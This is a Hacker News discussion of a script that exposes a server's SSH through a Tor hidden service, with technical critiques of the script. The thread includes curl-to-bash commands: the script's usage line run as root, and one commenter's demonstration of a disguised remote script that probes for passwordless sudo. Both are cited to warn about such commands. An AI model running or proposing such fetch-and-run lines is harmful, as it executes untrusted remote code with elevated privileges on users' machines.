
Show HN: tor_ssh.sh – One command to enable SSH access via Tor - NickBusey
https://gitlab.com/grownetics/devops/blob/master/tor_ssh.sh
======
miduil
Shameless plug: This script I wrote a while ago "automates" setting up a
hidden tor ssh service that isn't faulty for ssh-host key enumeration. I'd
like to improve it, but I'm not sure which audience I should target. If you
could review/try it out and you have any feedback, a GitHub issue or comment
here would be very appreciated.

[https://github.com/norpol/opensshd-tor-easy-
setup](https://github.com/norpol/opensshd-tor-easy-setup)

------
pwnna
This works pretty well, especially if you have personal computers behind
different NATs. One of the issue is still that you have to distribute the tor
domain name out all over the place. You also need to keep the keys safe if you
want to keep that domain name.

These two part I found to be more annoying to deal with, although this is true
for most VPN solutions (thinking about tinc, wireguard).

~~~
jancsika
> One of the issue is still that you have to distribute the tor domain name
> out all over the place.

I don't understand why you couldn't have a small utility to take a human
memorable password that maps to a weak-ass private key, then ratchet up to a
secure keypair on the server once the initial connection is made:

1\. Run utility in "server" mode.

2\. Enter password "I am not the target of a state level actor atm" into
utility

3\. Utility maps your weak-ass password to a weak-ass private key, generates
the pubkey from that, and consequently creates the Tor hidden service behind
which your openssh server can now be accessed.

4\. On the client, run the utility in "client" mode and type in your weak-ass
password

5\. Utility maps the password to the server's weakass kepair and generates the
corresponding onion address from it.

6\. Utility creates a tunnel over Tor to connect to that onion address.

7\. Server and client are now connected, with no memorization of human
unreadable strings. Hurray!

8\. Once connected, the server generates a _secure_ keypair and sends the
corresponding _new_ onion addy to the client over the current connection.

9\. Client receives the new onion addy, disconnects, then connects to the new
addy.

10\. Repeat for each client. Once all clients are connected, server destroys
the original hidden service.

------
buildbuildbuild
NAT traversal is a useful and underrated Tor hidden service use case.

Careful though: installing the version of Tor which is included in Ubuntu’s
distribution is not recommended, is often very out of date.

Use the Tor project’s PPA instead.

~~~
jamieweb
Exactly this.

Many times people have assumed that Tor is only for 'dark web' and other
things that there is no legitimate business using.

But as you say, escaping NAT is a perfect use-case. It's particularly good for
escaping CGNAT, as to be honest there aren't many other ways to escape CGNAT
and still have a 'listening' server, rather than just an always-open tunnel.

Edit: The Tor Project website has a useful section on how IT professionals use
Tor, which covers some more interesting ones:
[https://www.torproject.org/about/torusers.html.en#itprofessi...](https://www.torproject.org/about/torusers.html.en#itprofessionals)

------
dessant
This is also valuable for debugging CI builds, and it can be more secure than
the debugging mode CI services provide when coupled with an ssh key. For
example on Travis CI a host is displayed in the logs that anyone can access
through ssh.

[https://docs.travis-ci.com/user/running-build-in-debug-
mode/](https://docs.travis-ci.com/user/running-build-in-debug-mode/)

------
acdha
This line was puzzling:

    
    
        # Remove the bogus tor service Ubuntu installs by default
    

Is there a bug in the upstream package or something? Otherwise this just looks
like a big step back from systemd to SysV — without automatic restarts the
first time the daemon exits, you're locked out of the server.

~~~
NickBusey
[https://askubuntu.com/a/903341](https://askubuntu.com/a/903341)

~~~
acdha
Typically I'd put that into a comment right above that line. I'd also really
be inclined to install a replacement service instead so you'd get automatic
restarts if you aren't very confident that you have another way into the box.

~~~
NickBusey
Yea, I agree. I actually was thinking before I posted this "Someone will ask
about that line, I should just add the link to the comments" haha. (Just added
it.)

If you read the discussion in the link, this actually does do that. It just
replaces the 'empty' service with the actual tor service. So you do get
automatic restarts.

------
berbec

      # Append the hidden service configuration to the Torrc file
      echo -e "HiddenServiceDir /var/lib/tor/onion-ssh/\nHiddenServicePort 22 127.0.0.1:22" > /etc/tor/torrc
    

Unless the '>' is changed to ">>", this will overwrite the torrc file.

~~~
jstanley
The default ubuntu torrc has everything commented out so is effectively blank
anyway.

Using ">" instead of ">>" means you don't end up with multiple copies of the
same hidden service.

That said, I agree: it should append, but it should first check whether it has
already added a hidden service to the file.

~~~
NickBusey
Exactly, for simplicity since nothing is in there by default, it gets
overwritten. To keep the script nice and short I decided not to add that
detection. I would happily merge the change if someone decides they care
enough to add it.

~~~
berbec
Maybe something like

    
    
      if [ $(grep "HiddenServicePort 22" /etc/tor/torrc | wc -l) -eq 0]

~~~
jstanley
Or the more idiomatic:

    
    
      if grep -q "HiddenServiceDir /var/lib/tor/onion-ssh/" /etc/tor/torrc

~~~
berbec
I wish bash had a ternary operator for extra IOCCC-compliance.

------
adenner
I actually presented on something close to this a couple of months ago to the
local LUG. I made a raspberry pi tor jump server that would allow you to ssh
over tor into your home network to bust through the NAT. My slide deck is
[https://content.evernote.com/shard/s84/sh/00920ea8-78a7-4b1a...](https://content.evernote.com/shard/s84/sh/00920ea8-78a7-4b1a-9d9a-7549f1dbee92/632892f26d65098d/res/e97c138c-512c-4961-853b-8a5ca8ec1c4e/PiJump.pdf)

------
bromonkey
tor_ssh.sh – One command to enable SSH access via Tor to _some_ servers:
Debian is not the entirety of Linux

------
jamieweb
How come you aren't using ```HiddenServiceVersion 3```?

Onion v2 (16 char addresses) uses old crypto (SHA1/DH/RSA1024) and has now
been superseded by Onion v3 (56 char addresses, SHA3/ed25519/curve25519 and
many other improvements).

[https://trac.torproject.org/projects/tor/wiki/doc/NextGenOni...](https://trac.torproject.org/projects/tor/wiki/doc/NextGenOnions)

------
0xdeadbeefbabe
Will ssh experience timeouts and connection aborts detailed here
[http://sites.inka.de/bigred/devel/tcp-
tcp.html](http://sites.inka.de/bigred/devel/tcp-tcp.html) or is that not
applicable?

Nice script BTW.

------
ressetera
There's also torsocks or even tsocks if you need something more battle tested.

EDIT: I stand corrected, see @buildbuildbuild reply.

~~~
buildbuildbuild
That does the reverse: allows you to connect to public IP addresses through
Tor. This solution exposes your local SSH server as a static hidden service
without needing to forward ports in a NATed environment.

------
thomasdd
Posted on HN 6 days ago, by same user: (zero comments received).

[https://news.ycombinator.com/item?id=19265301](https://news.ycombinator.com/item?id=19265301)

------
throwaway2048
"any server" running ubuntu...

------
UI_at_80x24
I like the theory behind this and the motivation. But this has to stop:

># Usage (as root): $ bash <(curl -s
[https://gitlab.com/grownetics/devops/raw/master/tor_ssh.sh](https://gitlab.com/grownetics/devops/raw/master/tor_ssh.sh))

Spoon feeding like this is why Windows has such a disgusting history of
malware, and only encourages people to not think about what they are doing.

~~~
acdha
What specific threat do you believe your advice is protecting people against?

~~~
LinuxBender
sudo -n is a start.

Here is one I wrote that shows your internet speed, but will also check to see
if you have passwordless sudo. Even without sudo, I could spawn and persist a
gateway port ssh proxy outbound to a VPS node, but with sudo, I could do much
more.

    
    
        curl -A Mozilla -s https://tinyvpn.org/misc/url_test.txt | bash

~~~
acdha
… and you've installed this on Gitlab's servers? If not, the knowledge that
people write malicious code is not new but the problem isn't running it using
curl but not vetting the source and code before you run it. Focusing on the
use of curl distracts attention from the part which matters.

~~~
LinuxBender
I understand what you are saying, but respectfully disagree.

Conditioning people to use `curl | bash` trains them to not review anything
and blindly run untrusted code. I have proven this across a very large group
of people, including many that are supposed to be security minded. This
technique works on nearly all organizations, as most companies and government
agencies do not force outbound traffic through a mitm proxy. I have mixed
feelings about those devices.

For what it's worth, where the code is running from doesn't really matter. The
only advantage to pulling something from gitlab or github, is that I have to
commit changes that anyone could see assuming I dont recreate the repo, which
I can automate in their API. From any of my own VM's or servers, I can
certainly make something look like a .txt that isn't and dynamically changes
based on user-agent, remote addr, latency, ttl, etc.. I could even change the
response if someone used curl with a fake user-agent, based on timing, but
that is another blog post for another day.

~~~
acdha
Fair enough but I would ask whether this is really that much worse than, say,
running "npm install" or "pip install" for a package whose author you don't
implicitly trust. From my perspective, that time would be better spent
educating developers and working to make their tools safer to use — for
example, using aws-vault on a Mac means that that a drive-by script cannot
harvest your AWS credentials (the key chain requires prompting per-binary and
the user cannot bypass it).

~~~
LinuxBender
Tools like pip, pear, gem, etc... are quite bad as well. Unless they are
validating gpg checks of files or packages against a trusted source, then you
could easily be installing a package from a mirror that has been compromised.
In fact, this has happened to python repositories several times.

Even gpg checks when done the way Ubuntu and Redhat do it, is also bad. I see
people install the gpg keys from the mirror all the time. If I pop the mirror,
I can simply put my own gpg keys in the mirror and a percentage of people will
happily install it.

~~~
acdha
GPG adds usability problems and doesn’t much help in the case where people
have no idea whether the remote author they’ve never met is trustworthy. In
most cases something like a Linux distribution is what you want where things
are at least highly visible and a trusted third-party is looking at the update
history.

Modern package managers do at least store hashes so your NPM, Python, Rust,
etc. packages can depend on other packages with hashes in addition to just a
version, which at least forces them to attempt to make the exploit covert
enough that it can be deployed to everyone but there are many ways to make
something subtly vulnerable. Ultimately, I really think this is coming back to
securing the environment so a successful attack gets less. Apple has led the
way on protecting things like passwords and mail from other processes running
as the same user but it’d be really interesting to see how far you could get
running your entire toolchain using the OS’ sandboxing.

------
xiii1408
Using SSH over Tor is a supremely dumb idea unless you _really_ need to hide
your SSH sessions and you're already using other methods (pre-shared host
fingerprint, single-use SSH key) to secure your session.

1) Tor exit node operators will do all kinds of nasty things: e.g. MITM-ing
your sessions, refusing to handle certain kinds of traffic, and recording
everything.

2) If you use your regular SSH key (which you will, because you needed to use
this script to do this), your SSH key fingerprint and thus your identity is
still recorded by the remote host. Doh!

3) Everyone at the remote host will think you got haxed. Because you're
logging in through Tor. Or else they'll think you're super shady.

That said, Tor is super fun to play around with. Just don't assume anything
gives you real protection unless you're careful and really know the ins and
outs.

~~~
jstanley
1.) This doesn't go via an exit node, so this point is invalid.

2.) Why is this a problem? You already own the remote host, so you already
know your identity.

3.) It will appear to the remote host as a login from the loopback device. And
if you set this up you presumably own the remote host anyway so you don't care
what its owner thinks.

